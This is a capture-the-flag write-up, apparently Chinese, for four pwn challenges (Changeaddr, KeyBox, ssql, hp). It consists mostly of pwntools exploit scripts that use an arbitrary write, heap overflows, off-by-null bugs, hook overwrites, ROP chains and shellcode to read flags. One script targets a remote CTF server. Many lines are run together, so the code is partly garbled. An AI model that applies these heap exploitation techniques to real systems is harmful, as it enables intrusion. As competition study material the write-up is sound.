Changeaddr
任意地址写,控制程序执行getflag函数
from pwn import *
context.log_level='debug'
#r=process("./ChangeAddr")
r=remote('116.236.144.37',28526)
r.recvuntil("Now you can write one 4 byte value to memory. Where would you like to write?")
r.sendline("0804C01C")
r.recvuntil("?")
r.sendline("0804932C")
r.recvuntil("segment fault!")
#gdb.attach(r)
r.sendline("aaaaaa4564564aaadddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd")
r.interactive()Keybox
2.23堆溢出
from pwn import *
context.log_level='debug'
r=process('./KeyBox')
elf=ELF('./KeyBox')
libc=elf.libcr.sendlineafter("Input the first key: ",str(-0x1fffffffffFFFFF4))
r.sendlineafter("Input the second key: ",'1')def show():r.sendlineafter("Your choice:",'1')def add(size,content):r.sendlineafter("Your choice:",'2')r.sendlineafter("Please enter the length of the item:",str(size))r.sendafter("Please enter the name of item:",content)
def edit(idx,size,content):r.sendlineafter("Your choice:",'3')r.sendlineafter("Please enter the index of item:",str(idx))r.sendlineafter("Please enter the length of item:",str(size))r.sendlineafter("Please enter the new name of the item:",content)
def delete(idx):r.sendlineafter("Your choice:",'4')r.sendlineafter("Please enter the index of item:",str(idx))add(0x10,'a'*0x10)#0
add(0x10,'c'*0x10)#1
add(0x20,'a')#2
add(0x68,'a')#3
add(0x20,'a')#4
add(0x68,'a')#5
add(0x68,'a')#6edit(0,0x30,b'a'*0x10+p64(0)+p64(0xf1))
delete(1)
add(0x10,'a')#1
show()
libc_base=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-88-0x10-libc.sym['__malloc_hook']
print("libc_base------------>",hex(libc_base))
malloc_hook=libc_base+libc.sym['__malloc_hook']-0x23
system=libc_base+libc.sym['system']
add(0xc1,'a')delete(6)
edit(5,0xf0,b'a'*0x68+p64(0x71)+p64(malloc_hook))
add(0x68,'/bin/sh\x00')#6
add(0x68,b'a'*0x13+p64(0x401765))
r.sendlineafter("Your choice:",'2')
r.sendlineafter("Please enter the length of the item:",str(0x20))# gdb.attach(r)
r.interactive()ssql
程序实现了用堆块进行数据库管理,一共有申请,释放,编辑,打印四个功能。首先是创建table,然后每个table可以创建多个column,需要逆向出数据库这四个功能的对应语句结构,才能使用这四个功能。
漏洞点就是edit函数的strcpy末尾多加\x00,造成offbynull。
通过溢出0字节,可以改堆块指针,同时在对应的地方伪造一个chunk造成堆块重叠。
from pwn import *
context.log_level='debug'
r=process('./pwn')
elf=ELF('./pwn')
libc=elf.libcdef add(idx):r.sendafter("mysql > ",'CREATE TABLE {}'.format(idx))def delete(idx):r.sendafter("mysql > ",'DELETE TABLE {}'.format(idx))def show(idx):r.sendafter("mysql > ",'SHOW TABLE {}'.format(idx))def add_c(c,idx):r.sendafter("mysql > ",'CREATE {} TABLE {}'.format(c,idx))def delete_c(c,idx):r.sendafter("mysql > ",'DELETE {} FROM {}'.format(c,idx))def edit_c(c,idx,name,content):r.sendafter("mysql > ",'EDIT {} FROM {}'.format(c,idx))r.sendafter("Column name:",name)r.sendafter("Column Content: ",content)#----------------leak_heap-----------------
add(1)
add_c(0,1)
add_c(1,1)
delete_c(1,1)
delete_c(0,1)
add_c(0,1)
show(1)
r.recvuntil("Column Content: ")
heap_base=u64(r.recv(6).ljust(8,b'\x00'))-0x470
print("heap_base------------>",hex(heap_base))#---------------------leak_libc-----------------
for i in range(6):add_c(i+1,1)
payload=b'\x00'*0xc0+p64(0)+p64(0x541)+p64(0x31)+p64(0)+p64(heap_base+0x400)
edit_c(0,1,b'a'*0x10,payload)
delete(1)
add(1)
add_c(0,1)
add_c(1,1)
show(1)
libc_base=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-0x10-96-libc.sym['__malloc_hook']
print("libc_base----------->",hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
one_gadget=[0xe3afe,0xe3b01,0xe3b04]
ogg=libc_base+one_gadget[1]
add_c(2,1)
add_c(3,1)
edit_c(0,1,b'a'*0x10,b'b'*0xc0+p64(0)+p64(0x31)*2+p64(0)+p64(heap_base+0x540)+p64(heap_base+0x300)+p64(heap_base+0x590))
edit_c(2,1,b'a'*7,b'\x00'*0x10+p64(heap_base+0x590)+p64(0x111))
delete(1)
add(1)
add_c(0,1)
add_c(1,1)edit_c(1,1,b'a'*7,p64(0)*3+p64(0x111)+p64(free_hook))
add_c(2,1)
add_c(3,1)
edit_c(3,1,b'a'*0x10,p64(ogg))
delete(1)
# gdb.attach(r)
r.interactive()hp
这个题主要是逆向难度大,需要逆向出堆块申请等功能对应的语句,不过跟http协议头有点类似。
首先要调用login函数让dword_5280=1,然后才能执行其他功能。
漏洞点在edit函数中有一个offbynull
由于这个题有沙箱,因此需要orw读取flag。
思路1:先改freehook为setcontext,然后在对应堆块中写orw链并执行。
思路2:改freehook为setcontext,然后执行mprotect将heap段权限改为7,然后在对应堆块里写shellcode:开辟内存写flag,调用32位open,rw。
exp1
from pwn import *
context.log_level='debug'
context.arch='amd64'
r=process('./pwn')
elf=ELF('./pwn')
libc=elf.libc
def login():payload='POST /login HTTP/1.0 \nUsername:'+'a'*0x20+'\x01\n'+'Password:aaaa\r\n\n'r.sendafter("parser> ",payload)
def add(cont):payload='POST /create HTTP/1.0 \nContent-Length:'+str(len(cont)-1)+'\r\n\r\n'+contr.sendafter("parser> ",payload)
def delete(idx):payload='POST /delete HTTP/1.0 \nIdx:' + str(idx)+"\n"+"Content-Length:1"+"\n" + '\r\n\r\n'r.sendafter("parser> ",payload)
def show(idx):payload='POST /show HTTP/1.0 \nIdx:' + str(idx)+"\n"+"Content-Length:1"+"\n" + '\r\n\r\n'r.sendafter("parser> ",payload)
def edit(idx,cont):payload='POST /edit HTTP/1.0 \nIdx:' + str(idx) +'\n'+"Content-Length:"+str(len(cont)-1)+'\r\n\r\n'+contr.sendafter("parser> ",payload)#------------leak----------------------#
login()
add('a'*0x440)#0
add('a'*2)#1
delete(0)
add('a'*0x18)#0
show(0)
libc_base=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-0x410-96-libc.sym['__malloc_hook']
print("libc_base------------->",hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
setcontext=libc_base+libc.sym['setcontext']
r.recv(10)
heap_base=u64(r.recv(6).ljust(8,b'\x00'))-0x250
print("heap_base----------->",hex(heap_base))
pop_rax_ret = libc_base + 0x000000000001b500
pop_rdi_ret= libc_base + 0x000000000002164f
pop_rsi_ret = libc_base + 0x0000000000023a6a
pop_rdx_ret = libc_base + 0x0000000000001b96
syscall_ret = libc_base + 0x00000000000d2625
open_=libc_base+libc.sym['open']
add('a'*0x420)#2
add('a'*0x439)#3
for i in range(3):#456add('a'*0x109)add('a'*0x4f0)#7
add('c'*0x20)#8
edit(6,'a'*0x108+'\x01')
for i in range(8,-1,-1):edit(6,'a'*(0x100+i)+'\x01')
edit(6,'a'*0x101+p16(0x440+0x330).decode())
delete(3)
delete(7)
add('a'*0x400)#3
delete(4)
add('b'*0x50)#4
edit(4,'a'*0x31+p64(free_hook)[0:6])
add('a'*0x109)#7
add('b'*0x109)#9
edit(9,'a'+p64(setcontext+53)[0:6])
add('b'*0x500)#10flag_addr=heap_base+0xb40
data=free_hook+0x100
orw={0x98:{0x0:heap_base+0xc40,0x8:pop_rdi_ret+1},0xf8:{0x0:[pop_rdi_ret,flag_addr,pop_rsi_ret,0,open_,pop_rax_ret, # sys_read(flag_fd, heap, 0x100)0,pop_rdi_ret,3,pop_rsi_ret,heap_base+0x200,pop_rdx_ret,0x40,syscall_ret,pop_rax_ret, # sys_write(1, heap, 0x100)1,pop_rdi_ret,1,pop_rsi_ret,heap_base+0x200,pop_rdx_ret,0x40,syscall_ret]}}payload='flag\x00\x00\x00\x00'+flat(orw)i = len(payload) - 1
while i >= 0:if payload[i] == '\x00':edit(10,'a'+ 'b' * i)i = i - 1else:j = iwhile payload[j] != '\x00':j = j - 1edit(10,'a'+ 'b' * (j + 1) + payload[j + 1: i + 1])i = j
gdb.attach(r)
delete(10)r.interactive()exp2
from pwn import *
context.log_level='debug'
context.arch='amd64'
r=process('./pwn')
elf=ELF('./pwn')
libc=elf.libc
def login():payload='POST /login HTTP/1.0 \nUsername:'+'a'*0x20+'\x01\n'+'Password:aaaa\r\n\n'r.sendafter("parser> ",payload)
def add(cont):payload='POST /create HTTP/1.0 \nContent-Length:'+str(len(cont)-1)+'\r\n\r\n'+contr.sendafter("parser> ",payload)
def delete(idx):payload='POST /delete HTTP/1.0 \nIdx:' + str(idx)+"\n"+"Content-Length:1"+"\n" + '\r\n\r\n'r.sendafter("parser> ",payload)
def show(idx):payload='POST /show HTTP/1.0 \nIdx:' + str(idx)+"\n"+"Content-Length:1"+"\n" + '\r\n\r\n'r.sendafter("parser> ",payload)
def edit(idx,cont):payload='POST /edit HTTP/1.0 \nIdx:' + str(idx) +'\n'+"Content-Length:"+str(len(cont)-1)+'\r\n\r\n'+contr.sendafter("parser> ",payload)#------------leak----------------------#
login()
add('a'*0x440)#0
add('a'*2)#1
delete(0)
add('a'*0x18)#0
show(0)
libc_base=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-0x410-96-libc.sym['__malloc_hook']
print("libc_base------------->",hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
setcontext=libc_base+libc.sym['setcontext']
mprotect=libc_base+libc.sym['mprotect']
r.recv(10)
heap_base=u64(r.recv(6).ljust(8,b'\x00'))-0x250
print("heap_base----------->",hex(heap_base))add('a'*0x420)#2
add('a'*0x439)#3
for i in range(3):#456add('a'*0x109)add('a'*0x4f0)#7
add('c'*0x20)#8
edit(6,'a'*0x108+'\x01')
for i in range(8,-1,-1):edit(6,'a'*(0x100+i)+'\x01')
edit(6,'a'*0x101+p16(0x440+0x330).decode())
delete(3)
delete(7)
add('a'*0x400)#3
delete(4)
add('b'*0x50)#4
edit(4,'a'*0x31+p64(free_hook)[0:6])
add('a'*0x109)#7
add('b'*0x109)#9
edit(9,'a'+p64(setcontext+53)[0:6])
add('b'*0x500)#10frame=SigreturnFrame()
frame.rdi=heap_base
frame.rsi=0x1000
frame.rdx=0x7
frame.rip=mprotect
frame.rsp=heap_base+0xc38shellcode='''mov rax, 192 mov rbx, 0x400000mov rcx, 0x1000mov rdx, 7mov rsi, 0x100022mov rdi, 0int 0x80mov rsp, 0x400108push 0x67616c66mov rax, 5 mov rbx, 0x400100mov rcx, 0mov rdx, 0int 0x80mov rdi, 3 mov rax, 0mov rsi, rspmov rdx, 0x50syscallmov rax,1 mov rdi,1syscall'''payload = str(frame)+p64(heap_base+0xc40)+asm(shellcode,arch='amd64')
i = len(payload) - 1
while i >= 0:if payload[i] == '\x00':edit(10,'a'+ 'b' * i)i = i - 1else:j = iwhile payload[j] != '\x00':j = j - 1edit(10,'a'+ 'b' * (j + 1) + payload[j + 1: i + 1])i = j
gdb.attach(r)
delete(10)
r.interactive()执行得flag
